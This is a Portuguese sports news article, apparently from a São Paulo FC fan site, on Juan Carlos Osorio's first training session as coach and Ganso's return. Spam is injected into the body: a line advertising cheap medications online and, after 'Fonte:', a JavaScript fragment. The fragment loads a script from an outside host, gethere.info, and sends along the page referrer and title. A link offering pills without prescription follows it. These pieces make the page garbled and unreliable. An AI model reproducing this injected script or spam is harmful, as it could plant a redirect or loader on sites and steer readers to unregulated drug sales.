Destaque

Em primeiro treino, Osorio observa e conversa com Milton; Ganso retorna

Juan Carlos Osorio foi apresentado como novo treinador do São Paulo nesta segunda-feira, e não perdeu tempo. O colombiano teve o seu primeiro contato com o elenco e foi a campo para observar o treinamento realizado no CT da Barra Funda. O comandante, no entanto, pouco interagiu com os jogadores e apenas os observou na maior parte do tempo.

Ao lado do auxiliar Milton Cruz, Osorio viu a movimentação em campo reduzido comandada pelo preparador físico José Mário Campeiz sem se comunicar com os jogadores. O colombiano cumprimentou os jornalistas que acompanhavam a atividade e trocou algumas poucas palavras apenas com o tímido argentino Centurión, pouco comunicativo na rotina do Tricolor.

Logo de cara, Osorio mostrou uma de suas marcas registradas. Ele apareceu no gramado com as tradicionais canetas guardadas na meia, além de uma prancheta.

O treinamento contou apenas com os jogadores que não foram titulares no empate sem gols com o Internacional, no último domingo domingo, em Porto Alegre. A principal novidade foi o retorno de Paulo Henrique Ganso. O meia pediu para não viajar por causa de problemas familiares, mas voltou a trabalhar normalmente nesta segunda-feira.

No gramado, a comissão técnica são-paulina dividiu os atletas em dois grupos. No primeiro momento, priorizou movimentação e toques rápidos. Na segunda parte, colocou um goleiro de cada lado e passou a focar em jogadas pelas laterais. Centurión e Rodrigo Caio foram os destaques, com belos gols.

add in cart at a low figure medications online osorio spfc treino

Ainda sem contar com Osorio no banco, pois o colombiano espera o visto de trabalho para comandar a equipe, o São Paulo volta a campo nesta quarta-feira. Pela quinta rodada do Campeonato Brasileiro, o Tricolor recebe o Santos, às 21h (de Brasília), no estádio do Morumbi. A previsão é de que Osorio faça sua estreia sábado, contra o Grêmio, no Morumbi.

Fonte:s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; purchase cheat generic pills without prescription – http://www.spanking.com/review/purchase-cheat-generic-pills-without-prescription/

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Destaque

Mais em Destaque

36 mil torcedores acompanharam a derrota por 1×0 para o Santos. Mais uma derrota em clássicos…

saopauloadmin18 de Fevereiro de 2018

Relacionados para São Paulo x Santos

saopauloadmin18 de Fevereiro de 2018

Valdívia celebra vitória em estreia pelo São Paulo: “Um bom começo”

saopauloadmin16 de Fevereiro de 2018

Dorival rebate críticas ao SP: “Não vejo time com futebol vistoso no Brasil”

saopauloadmin16 de Fevereiro de 2018

Com Aloísio na arquibancada, Tricolor bate o CSA-AL e avança

saopauloadmin16 de Fevereiro de 2018

Relacionados para CSA-AL x São Paulo

saopauloadmin14 de Fevereiro de 2018

Cueva pode atingir marca especial na carreira

saopauloadmin13 de Fevereiro de 2018

Defesa tem o melhor início de ano desde 2008

saopauloadmin12 de Fevereiro de 2018

Valdívia se vê mais “feliz” na ponta e projeta briga por vaga no São Paulo

saopauloadmin11 de Fevereiro de 2018